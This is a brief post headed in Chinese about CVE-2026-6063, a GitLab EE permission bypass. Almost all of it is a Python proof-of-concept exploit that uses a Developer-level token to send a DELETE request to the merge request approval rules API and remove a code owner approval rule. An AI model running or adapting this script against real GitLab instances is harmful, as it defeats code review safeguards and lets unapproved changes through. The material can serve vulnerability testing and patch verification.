CVE-2026-6063 GitLab EE权限绕过允许移除代码批准规则

import requests # Exploit Concept for CVE-2026-6063 # Description: Remove code owner approval rules via API as a Developer role. token = 'YOUR_GITLAB_PERSONAL_ACCESS_TOKEN' gitlab_url = 'https://gitlab.example.com' project_id = '123' merge_request_iid = '456' approval_rule_id = '1' # ID of the code owner rule to remove headers = {'PRIVATE-TOKEN': token} # API endpoint to delete an approval rule url = f"{gitlab_url}/api/v4/projects/{project_id}/merge_requests/{merge_request_iid}/approval_rules/{approval_rule_id}" response = requests.delete(url, headers=headers) if response.status_code == 204: print("[+] Successfully removed approval rule.") else: print("[-] Failed to remove rule. Status code:", response.status_code)